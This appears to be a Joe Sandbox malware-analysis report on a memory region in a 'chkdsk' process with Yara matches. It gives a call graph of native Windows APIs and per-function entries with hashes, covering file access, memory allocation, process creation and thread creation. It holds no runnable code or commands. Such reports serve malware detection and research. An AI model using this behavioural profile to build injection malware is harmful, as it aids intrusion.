72364->72369 72370 a5136 72364->72370 72421 aa2d0 LdrLoadDll 72365->72421 72367 a527e 72371 aa440 2 API calls 72367->72371 72372 a5125 72368->72372 72377 a5151 72369->72377 72409 ac0b0 72369->72409 72373 aa440 2 API calls 72370->72373 72374 a5289 72371->72374 72372->72306 72375 a513f 72373->72375 72374->72306 72375->72306 72380 a5163 72377->72380 72412 aa3c0 72377->72412 72379 a51b7 72381 a51ce 72379->72381 72420 aa250 LdrLoadDll 72379->72420 72380->72306 72383 a51ea 72381->72383 72384 a51d5 72381->72384 72386 aa440 2 API calls 72383->72386 72385 aa440 2 API calls 72384->72385 72385->72380 72387 a51f3 72386->72387 72388 a521f 72387->72388 72415 abcb0 72387->72415 72388->72306 72390 a520a 72391 abee0 2 API calls 72390->72391 72392 a5213 72391->72392 72392->72306 72393->72277 72394->72300 72396 a5964 72395->72396 72397 aaf60 LdrLoadDll 72395->72397 72398 aa2d0 LdrLoadDll 72396->72398 72397->72396 72398->72302 72400 aa45c NtClose 72399->72400 72401 aaf60 LdrLoadDll 72399->72401 72400->72307 72401->72400 72402->72287 72405 ac10a 72403->72405 72406 aa5e0 72403->72406 72405->72350 72407 aaf60 LdrLoadDll 72406->72407 72408 aa5fc RtlAllocateHeap 72407->72408 72408->72405 72410 aa5e0 2 API calls 72409->72410 72411 ac0c8 72409->72411 72410->72411 72411->72377 72413 aaf60 LdrLoadDll 72412->72413 72414 aa3dc NtReadFile 72413->72414 72414->72379 72416 abcbd 72415->72416 72417 abcd4 72415->72417 72416->72417 72418 ac0b0 2 API calls 72416->72418 72417->72390 72419 abceb 72418->72419 72419->72390 72420->72381 72421->72367 72553 aa4f0 72422->72553 72424 abe8d 72424->72312 72426 a4cd1 72425->72426 72427 a4cd9 72425->72427 72426->72314 72428 a4fac 72427->72428 72556 ad090 72427->72556 72428->72314 72430 a4d2d 72431 ad090 2 API calls 72430->72431 72434 a4d38 72431->72434 72432 a4d86 72435 ad090 2 API calls 72432->72435 72434->72432 72436 ad1c0 3 API calls 72434->72436 72570 ad130 LdrLoadDll RtlAllocateHeap RtlFreeHeap 72434->72570 72438 a4d9a 72435->72438 72436->72434 72437 a4df7 72439 ad090 2 API calls 72437->72439 72438->72437 72561 ad1c0 72438->72561 72441 a4e0d 72439->72441 72442 a4e4a 72441->72442 72445 ad1c0 3 API calls 72441->72445 72443 ad090 2 API calls 72442->72443 72444 a4e55 72443->72444 72446 ad1c0 3 API calls 72444->72446 72453 a4e8f 72444->72453 72445->72441 72446->72444 72449 ad0f0 2 API calls 72450 a4f8e 72449->72450 72451 ad0f0 2 API calls 72450->72451 72452 a4f98 72451->72452 72454 ad0f0 2 API calls 72452->72454 72567 ad0f0 72453->72567 72455 a4fa2 72454->72455 72456 ad0f0 2 API calls 72455->72456 72456->72428 72458 a5ff1 72457->72458 72459 a56a0 8 API calls 72458->72459 72464 a6007 72459->72464 72460 a6010 72460->72318 72461 a6047 72462 abee0 2 API calls 72461->72462 72463 a6058 72462->72463 72463->72318 72464->72460 72464->72461 72465 a6093 72464->72465 72466 abee0 2 API calls 72465->72466 72467 a6098 72466->72467 72467->72318 72469 aad64 72468->72469 72470 aabe0 LdrLoadDll 72468->72470 72571 aabe0 72469->72571 72470->72469 72472 aad6d 72473 aabe0 LdrLoadDll 72472->72473 72474 aad76 72473->72474 72475 aabe0 LdrLoadDll 72474->72475 72476 aad7f 72475->72476 72477 aabe0 LdrLoadDll 72476->72477 72478 aad88 72477->72478 72479 aabe0 LdrLoadDll 72478->72479 72480 aad91 72479->72480 72481 aabe0 LdrLoadDll 72480->72481 72482 aad9d 72481->72482 72483 aabe0 LdrLoadDll 72482->72483 72484 aada6 72483->72484 72485 aabe0 LdrLoadDll 72484->72485 72486 aadaf 72485->72486 72487 aabe0 LdrLoadDll 72486->72487 72488 aadb8 72487->72488 72489 aabe0 LdrLoadDll 72488->72489 72490 aadc1 72489->72490 72491 aabe0 LdrLoadDll 72490->72491 72492 aadca 72491->72492 72493 aabe0 LdrLoadDll 72492->72493 72494 aadd6 72493->72494 72495 aabe0 LdrLoadDll 72494->72495 72496 aaddf 72495->72496 72497 aabe0 LdrLoadDll 72496->72497 72498 aade8 72497->72498 72499 aabe0 LdrLoadDll 72498->72499 72500 aadf1 72499->72500 72501 aabe0 LdrLoadDll 72500->72501 72502 aadfa 72501->72502 72503 aabe0 LdrLoadDll 72502->72503 72504 aae03 72503->72504 72505 aabe0 LdrLoadDll 72504->72505 72506 aae0f 72505->72506 72507 aabe0 LdrLoadDll 72506->72507 72508 aae18 72507->72508 72509 aabe0 LdrLoadDll 72508->72509 72510 aae21 72509->72510 72511 aabe0 LdrLoadDll 72510->72511 72512 aae2a 72511->72512 72513 aabe0 LdrLoadDll 72512->72513 72514 aae33 72513->72514 72515 aabe0 LdrLoadDll 72514->72515 72516 aae3c 72515->72516 72517 aabe0 LdrLoadDll 72516->72517 72518 aae48 72517->72518 72519 aabe0 LdrLoadDll 72518->72519 72520 aae51 72519->72520 72521 aabe0 LdrLoadDll 72520->72521 72522 aae5a 72521->72522 72523 aabe0 LdrLoadDll 72522->72523 72524 aae63 72523->72524 72525 aabe0 LdrLoadDll 72524->72525 72526 aae6c 72525->72526 72527 aabe0 LdrLoadDll 72526->72527 72528 aae75 72527->72528 72529 aabe0 LdrLoadDll 72528->72529 72530 aae81 72529->72530 72531 aabe0 LdrLoadDll 72530->72531 72532 aae8a 72531->72532 72533 aabe0 LdrLoadDll 72532->72533 72534 aae93 72533->72534 72535 aabe0 LdrLoadDll 72534->72535 72536 aae9c 72535->72536 72537 aabe0 LdrLoadDll 72536->72537 72538 aaea5 72537->72538 72539 aabe0 LdrLoadDll 72538->72539 72540 aaeae 72539->72540 72541 aabe0 LdrLoadDll 72540->72541 72542 aaeba 72541->72542 72543 aabe0 LdrLoadDll 72542->72543 72544 aaec3 72543->72544 72545 aabe0 LdrLoadDll 72544->72545 72546 aaecc 72545->72546 72546->72322 72548 aaf60 LdrLoadDll 72547->72548 72549 a9e8c 72548->72549 72577 238fdc0 LdrInitializeThunk 72549->72577 72550 a9ea3 72550->72244 72552->72319 72554 aa50c NtAllocateVirtualMemory 72553->72554 72555 aaf60 LdrLoadDll 72553->72555 72554->72424 72555->72554 72557 ad0a0 72556->72557 72558 ad0a6 72556->72558 72557->72430 72559 ac0b0 2 API calls 72558->72559 72560 ad0cc 72559->72560 72560->72430 72562 ad130 72561->72562 72563 ac0b0 2 API calls 72562->72563 72566 ad18d 72562->72566 72564 ad16a 72563->72564 72565 abee0 2 API calls 72564->72565 72565->72566 72566->72438 72568 a4f84 72567->72568 72569 abee0 2 API calls 72567->72569 72568->72449 72569->72568 72570->72434 72572 aabfb 72571->72572 72573 a5aa0 LdrLoadDll 72572->72573 72575 aac1b 72573->72575 72574 aaccf 72574->72472 72575->72574 72576 a5aa0 LdrLoadDll 72575->72576 72576->72574 72577->72550 72578->72328 72580 aaf60 LdrLoadDll 72579->72580 72581 aa63c RtlFreeHeap 72580->72581 72581->72331 72583 9721b 72582->72583 72584 97220 72582->72584 72583->72252 72585 abe60 2 API calls 72584->72585 72591 97245 72585->72591 72586 972a8 72586->72252 72587 a9e70 2 API calls 72587->72591 72588 972ae 72590 972d4 72588->72590 72592 aa570 2 API calls 72588->72592 72590->72252 72591->72586 72591->72587 72591->72588 72594 abe60 2 API calls 72591->72594 72598 aa570 72591->72598 72593 972c5 72592->72593 72593->72252 72594->72591 72596 aa570 2 API calls 72595->72596 72597 974ee 72596->72597 72597->72209 72599 aa58c 72598->72599 72600 aaf60 LdrLoadDll 72598->72600 72603 238fb68 LdrInitializeThunk 72599->72603 72600->72599 72601 aa5a3 72601->72591 72603->72601 72605 ab623 72604->72605 72608 9a140 72605->72608 72607 9907b 72607->72217 72610 9a164 72608->72610 72609 9a16b 72609->72607 72610->72609 72611 9a1a0 LdrLoadDll 72610->72611 72612 9a1b7 72610->72612 72611->72612 72612->72607 72614 9a4b3 72613->72614 72615 9a530 72614->72615 72628 a9c40 LdrLoadDll 72614->72628 72615->72222 72618 aaf60 LdrLoadDll 72617->72618 72619 9d5ab 72618->72619 72619->72224 72620 aa780 72619->72620 72621 aaf60 LdrLoadDll 72620->72621 72622 aa79f LookupPrivilegeValueW 72621->72622 72622->72227 72624 aaf60 LdrLoadDll 72623->72624 72625 aa22c 72624->72625 72629 238fed0 LdrInitializeThunk 72625->72629 72626 aa24b 72626->72228 72628->72615 72629->72626 72631 9a637 72630->72631 72632 9a490 LdrLoadDll 72631->72632 72633 9a666 72632->72633 72633->72168 72635 9a384 72634->72635 72690 a9c40 LdrLoadDll 72635->72690 72637 9a3be 72637->72170 72639 9d79c 72638->72639 72640 9a610 LdrLoadDll 72639->72640 72641 9d7ae 72640->72641 72691 9d680 72641->72691 72644 9d7c9 72647 9d7d4 72644->72647 72648 aa440 2 API calls 72644->72648 72645 9d7e1 72646 9d7f2 72645->72646 72649 aa440 2 API calls 72645->72649 72646->72174 72647->72174 72648->72647 72649->72646 72651 9b4e6 72650->72651 72652 9b4f0 72650->72652 72651->72183 72653 9a490 LdrLoadDll 72652->72653 72654 9b561 72653->72654 72655 9a360 LdrLoadDll 72654->72655 72656 9b575 72655->72656 72657 9b598 72656->72657 72658 9a490 LdrLoadDll 72656->72658 72657->72183 72659 9b5b4 72658->72659 72660 a56a0 8 API calls 72659->72660 72661 9b609 72660->72661 72661->72183 72663 9c066 72662->72663 72664 9a490 LdrLoadDll 72663->72664 72665 9c07a 72664->72665 72710 9bd30 72665->72710 72667 9858c 72688 9b620 LdrLoadDll 72667->72688 72671 98233 72668->72671 72739 9da30 72668->72739 72670 98431 72670->72172 72671->72670 72744 a4ff0 72671->72744 72673 98292 72673->72670 72747 97fd0 72673->72747 72676 ad090 2 API calls 72677 982d9 72676->72677 72678 ad1c0 3 API calls 72677->72678 72680 982ee 72678->72680 72679 97210 4 API calls 72684 98340 72679->72684 72680->72684 72806 93660 10 API calls 72680->72806 72684->72670 72684->72679 72686 974d0 2 API calls 72684->72686 72752 9b200 72684->72752 72802 9d9d0 72684->72802 72807 9d4b0 21 API calls 72684->72807 72686->72684 72687->72178 72688->72188 72689->72193 72690->72637 72692 9d69a 72691->72692 72700 9d750 72691->72700 72693 9a490 LdrLoadDll 72692->72693 72694 9d6bc 72693->72694 72701 a9ef0 72694->72701 72696 9d6fe 72704 a9f30 72696->72704 72699 aa440 2 API calls 72699->72700 72700->72644 72700->72645 72702 a9f0c 72701->72702 72703 aaf60 LdrLoadDll 72701->72703 72702->72696 72703->72702 72705 a9f4c 72704->72705 72706 aaf60 LdrLoadDll 72704->72706 72709 23907ac LdrInitializeThunk 72705->72709 72706->72705 72707 9d744 72707->72699 72709->72707 72711 9bd47 72710->72711 72719 9da70 72711->72719 72715 9bdbb 72716 9bdc2 72715->72716 72730 aa250 LdrLoadDll 72715->72730 72716->72667 72718 9bdd5 72718->72667 72720 9da95 72719->72720 72731 97510 72720->72731 72722 9bd8f 72727 aa690 72722->72727 72723 a56a0 8 API calls 72725 9dab9 72723->72725 72725->72722 72725->72723 72726 abee0 2 API calls 72725->72726 72738 9d8b0 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 72725->72738 72726->72725 72728 aaf60 LdrLoadDll 72727->72728 72729 aa6af CreateProcessInternalW 72728->72729 72729->72715 72730->72718 72732 9760f 72731->72732 72733 97525 72731->72733 72732->72725 72733->72732 72734 a56a0 8 API calls 72733->72734 72735 97592 72734->72735 72736 abee0 2 API calls 72735->72736 72737 975b9 72735->72737 72736->72737 72737->72725 72738->72725 72740 9da4f 72739->72740 72741 a5aa0 LdrLoadDll 72739->72741 72742 9da5d 72740->72742 72743 9da56 SetErrorMode 72740->72743 72741->72740 72742->72671 72743->72742 72808 9d800 72744->72808 72746 a5016 72746->72673 72748 abe60 2 API calls 72747->72748 72751 97ff5 72748->72751 72749 98210 72749->72676 72751->72749 72828 a9830 72751->72828 72753 9b219 72752->72753 72754 9b21f 72752->72754 72876 9d2c0 72753->72876 72885 98c20 72754->72885 72757 9b22c 72758 ad1c0 3 API calls 72757->72758 72801 9b4c2 72757->72801 72759 9b248 72758->72759 72760 9b25c 72759->72760 72761 9d9d0 2 API calls 72759->72761 72894 a9cc0 72760->72894 72761->72760 72764 9b390 72910 9b1a0 LdrLoadDll LdrInitializeThunk 72764->72910 72765 a9eb0 2 API calls 72766 9b2da 72765->72766 72766->72764 72767 9b2e6 72766->72767 72774 9b339 72767->72774 72778 a9fc0 2 API calls 72767->72778 72767->72801 72769 9b3af 72770 9b3b7 72769->72770 72911 9b110 LdrLoadDll NtClose LdrInitializeThunk 72769->72911 72772 aa440 2 API calls 72770->72772 72775 9b3c1 72772->72775 72773 9b3d9 72773->72770 72776 9b3e0 72773->72776 72777 aa440 2 API calls 72774->72777 72775->72684 72779 9b3f8 72776->72779 72912 9b090 LdrLoadDll LdrInitializeThunk 72776->72912 72780 9b356 72777->72780 72778->72774 72913 a9d40 LdrLoadDll 72779->72913 72897 a92e0 72780->72897 72784 9b36d 72784->72801 72900 97680 72784->72900 72785 9b40c 72914 9af10 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 72785->72914 72788 9b430 72790 9b47d 72788->72790 72915 a9d70 LdrLoadDll 72788->72915 72917 a9dd0 LdrLoadDll 72790->72917 72793 9b48b 72795 aa440 2 API calls 72793->72795 72794 9b44e 72794->72790 72916 a9e00 LdrLoadDll 72794->72916 72796 9b495 72795->72796 72798 aa440 2 API calls 72796->72798 72799 9b49f 72798->72799 72800 97680 3 API calls 72799->72800 72799->72801 72800->72801 72801->72684 72803 9d9e3 72802->72803 72991 a9e40 72803->72991 72806->72684 72807->72684 72809 9d81d 72808->72809 72815 a9f70 72809->72815 72812 9d865 72812->72746 72816 a9f79 72815->72816 72817 aaf60 LdrLoadDll 72816->72817 72818 a9f8c 72817->72818 72826 238ffb4 LdrInitializeThunk 72818->72826 72819 9d85e 72819->72812 72821 a9fc0 72819->72821 72822 a9fdc 72821->72822 72823 aaf60 LdrLoadDll 72821->72823 72827 238fc60 LdrInitializeThunk 72822->72827 72823->72822 72824 9d88e 72824->72746 72826->72819 72827->72824 72829 ac0b0 2 API calls 72828->72829 72830 a9847 72829->72830 72849 98760 72830->72849 72832 a9862 72833 a9889 72832->72833 72834 a98a0 72832->72834 72835 abee0 2 API calls 72833->72835 72836 abe60 2 API calls 72834->72836 72837 a9896 72835->72837 72838 a98da 72836->72838 72837->72749 72839 abe60 2 API calls 72838->72839 72840 a98f3 72839->72840 72846 a9b94 72840->72846 72855 abea0 LdrLoadDll 72840->72855 72842 a9b79 72843 a9b80 72842->72843 72842->72846 72844 abee0 2 API calls 72843->72844 72845 a9b8a 72844->72845 72845->72749 72847 abee0 2 API calls 72846->72847 72848 a9be9 72847->72848 72848->72749 72850 98785 72849->72850 72851 9a140 LdrLoadDll 72850->72851 72852 987b8 72851->72852 72854 987dd 72852->72854 72856 9b940 72852->72856 72854->72832 72855->72842 72857 9b96c 72856->72857 72858 aa190 LdrLoadDll 72857->72858 72859 9b985 72858->72859 72860 9b98c 72859->72860 72867 aa1d0 72859->72867 72860->72854 72864 9b9c7 72865 aa440 2 API calls 72864->72865 72866 9b9ea 72865->72866 72866->72854 72868 aa1ec 72867->72868 72869 aaf60 LdrLoadDll 72867->72869 72875 238fbb8 LdrInitializeThunk 72868->72875 72869->72868 72870 9b9af 72870->72860 72872 aa7c0 72870->72872 72873 aa7df 72872->72873 72874 aaf60 LdrLoadDll 72872->72874 72873->72864 72874->72873 72875->72870 72877 9d2d7 72876->72877 72918 9c3b0 72876->72918 72884 9d2f0 72877->72884 72931 94000 72877->72931 72880 ac0b0 2 API calls 72882 9d2fe 72880->72882 72881 9d2ea 72958 a9160 72881->72958 72882->72754 72884->72880 72887 98c3b 72885->72887 72886 98d5b 72886->72757 72887->72886 72888 9d680 3 API calls 72887->72888 72889 98d3c 72888->72889 72890 98d6a 72889->72890 72891 98d51 72889->72891 72892 aa440 2 API calls 72889->72892 72890->72757 72990 96290 LdrLoadDll 72891->72990 72892->72891 72895 9b2b0 72894->72895 72896 aaf60 LdrLoadDll 72894->72896 72895->72764 72895->72765 72895->72801 72896->72895 72898 9d9d0 2 API calls 72897->72898 72899 a9312 72898->72899 72899->72784 72901 97698 72900->72901 72902 9a140 LdrLoadDll 72901->72902 72903 976b3 72902->72903 72904 a5aa0 LdrLoadDll 72903->72904 72905 976c3 72904->72905 72906 976cc PostThreadMessageW 72905->72906 72907 976fd 72905->72907 72906->72907 72908 976e0 72906->72908 72907->72684 72909 976ea PostThreadMessageW 72908->72909 72909->72907 72910->72769 72911->72773 72912->72779 72913->72785 72914->72788 72915->72794 72916->72790 72917->72793 72919 9c3e3 72918->72919 72963 9a750 72919->72963 72921 9c3f5 72967 9a8c0 72921->72967 72923 9c413 72924 9a8c0 LdrLoadDll 72923->72924 72925 9c429 72924->72925 72926 9d800 3 API calls 72925->72926 72927 9c44d 72926->72927 72928 9c454 72927->72928 72929 ac0f0 2 API calls 72927->72929 72928->72877 72930 9c464 72929->72930 72930->72877 72932 9402c 72931->72932 72933 9b940 3 API calls 72932->72933 72935 94103 72933->72935 72934 94695 72934->72881 72935->72934 72970 ac130 72935->72970 72937 9416e 72938 9a490 LdrLoadDll 72937->72938 72939 942f4 72938->72939 72940 9a490 LdrLoadDll 72939->72940 72941 94318 72940->72941 72974 9ba00 72941->72974 72945 943b3 72946 94479 72945->72946 72947 9ba00 2 API calls 72945->72947 72949 abe60 2 API calls 72946->72949 72948 94452 72947->72948 72948->72946 72951 aa0d0 2 API calls 72948->72951 72950 944e6 72949->72950 72952 abe60 2 API calls 72950->72952 72951->72946 72953 944ff 72952->72953 72953->72934 72954 9a490 LdrLoadDll 72953->72954 72955 94547 72954->72955 72956 9a360 LdrLoadDll 72955->72956 72957 945f9 72956->72957 72957->72881 72959 a9181 72958->72959 72960 a5aa0 LdrLoadDll 72958->72960 72961 a91a7 72959->72961 72962 a9194 CreateThread 72959->72962 72960->72959 72961->72884 72962->72884 72964 9a777 72963->72964 72965 9a490 LdrLoadDll 72964->72965 72966 9a7b3 72965->72966 72966->72921 72968 9a490 LdrLoadDll 72967->72968 72969 9a8d9 72967->72969 72968->72969 72969->72923 72971 ac13d 72970->72971 72972 a5aa0 LdrLoadDll 72971->72972 72973 ac150 72972->72973 72973->72937 72975 9ba25 72974->72975 72983 aa040 72975->72983 72978 aa0d0 72979 aaf60 LdrLoadDll 72978->72979 72980 aa0ec 72979->72980 72989 238fab8 LdrInitializeThunk 72980->72989 72981 aa10b 72981->72945 72984 aaf60 LdrLoadDll 72983->72984 72985 aa05c 72984->72985 72988 238fb50 LdrInitializeThunk 72985->72988 72986 9438c 72986->72945 72986->72978 72988->72986 72989->72981 72990->72886 72992 aaf60 LdrLoadDll 72991->72992 72993 a9e5c 72992->72993 72996 238fd8c LdrInitializeThunk 72993->72996 72994 9da0e 72994->72684 72996->72994 72997 238f900 LdrInitializeThunk 73000 a9030 73001 abe60 2 API calls 73000->73001 73003 a906b 73000->73003 73001->73003 73002 a914c 73003->73002 73004 9a140 LdrLoadDll 73003->73004 73005 a90a1 73004->73005 73006 a5aa0 LdrLoadDll 73005->73006 73008 a90bd 73006->73008 73007 a90d0 Sleep 73007->73008 73008->73002 73008->73007 73011 a8c60 LdrLoadDll 73008->73011 73012 a8e60 LdrLoadDll 73008->73012 73011->73008 73012->73008

                                          Executed Functions

                                          Function 000AA30A Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 578 aa30a-aa361 call aaf60 NtCreateFile
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000005,00000000,000A5807,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,000A5807,00000000,00000005,00000060,00000000,00000000), ref: 000AA35D
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 526d8af1cc16e6cc8e77e747ce593d3ecd62deabcd067f35c37ebd3221ce3384
                                          • Instruction ID: 5b098419a38f314ec1b3447c7b198369272d7c06b0bd10c79b9dedcdc3687fac
                                          • Opcode Fuzzy Hash: 526d8af1cc16e6cc8e77e747ce593d3ecd62deabcd067f35c37ebd3221ce3384
                                          • Instruction Fuzzy Hash: 1F01B2B6201108AFDB48CF89DD84EDB37A9EF8C754F118209BA0D97245C630E851CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000AA310 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 584 aa310-aa326 585 aa32c-aa361 NtCreateFile 584->585 586 aa327 call aaf60 584->586 586->585
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000005,00000000,000A5807,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,000A5807,00000000,00000005,00000060,00000000,00000000), ref: 000AA35D
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
                                          • Instruction ID: 6ddbb91c26d3c13b7dfacc4c5120fd77cd6c108b4e6f7e2558dfd52536995af9
                                          • Opcode Fuzzy Hash: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
                                          • Instruction Fuzzy Hash: E5F06DB6215208AFCB48DF89DC85EEB77ADAF8C754F118258BA0997241D630F851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000AA43A Relevance: 1.5, APIs: 1, Instructions: 40nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 587 aa43a-aa43c 588 aa43e-aa469 call aaf60 NtClose 587->588 589 aa40d-aa426 587->589 590 aa42c-aa439 589->590 591 aa427 call aaf60 589->591 591->590
                                          APIs
                                          • NtClose.NTDLL(000A59A0,00000206,?,000A59A0,00000005,FFFFFFFF), ref: 000AA465
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 96a0fe0b6fb14caa950e60e142c5327bed1a3eda9c268077f3c50300f493a8ba
                                          • Instruction ID: e026732d26973c8e848944f83031661203235c941d1e2512f859bb05c18e5fe3
                                          • Opcode Fuzzy Hash: 96a0fe0b6fb14caa950e60e142c5327bed1a3eda9c268077f3c50300f493a8ba
                                          • Instruction Fuzzy Hash: E6F0F0762002046FCB14EBE8DC88DE77B98EF85720F1082A5FA5C5B203C630E604C7E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000AA3C0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtReadFile.NTDLL(000A59C2,5D9515B3,FFFFFFFF,000A5681,00000206,?,000A59C2,00000206,000A5681,FFFFFFFF,5D9515B3,000A59C2,00000206,00000000), ref: 000AA405
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
                                          • Instruction ID: 2e7aa00841df56ee78ae12b2aa4615553d3f73f594cdfbd13956bb1f83754da3
                                          • Opcode Fuzzy Hash: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
                                          • Instruction Fuzzy Hash: 00F0B7B2200208AFCB18DF99DC85EEB77ADEF8C754F118258BE0D97241D630E811CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000AA4EA Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00092D11,00002000,00003000,00000004), ref: 000AA529
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: 8ea367853878e2a12d50fe2c5dd6769ea30187154150b65441a91f214ad7f4df
                                          • Instruction ID: 941b64f263e922f64db3fb1f1a4098279cade5e1e4eac6e0e51a1d006f7bcebb
                                          • Opcode Fuzzy Hash: 8ea367853878e2a12d50fe2c5dd6769ea30187154150b65441a91f214ad7f4df
                                          • Instruction Fuzzy Hash: 37F08CB2610119AFDB14DF98DC81EEB7BA8EF8D344F118118FE0DA7242C630E811CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000AA4F0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00092D11,00002000,00003000,00000004), ref: 000AA529
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
                                          • Instruction ID: ab9f5d10be601f42032e75e32301439c3cc46a9d6e3b764bbff35ce10e7a43dc
                                          • Opcode Fuzzy Hash: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
                                          • Instruction Fuzzy Hash: 43F0F2B2210208ABDB18DF89DC81EAB77ADAF88654F118118BA0897241C630E810CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000AA440 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtClose.NTDLL(000A59A0,00000206,?,000A59A0,00000005,FFFFFFFF), ref: 000AA465
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
                                          • Instruction ID: 4a555a709dca0368a8842ae22a5ce294f6f757af01c04b687b1686257272d3f3
                                          • Opcode Fuzzy Hash: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
                                          • Instruction Fuzzy Hash: D7D01772200218ABD624EBD8DC89ED77BACDF49A60F118065BA485B282C630FA00C6E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 023900C4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
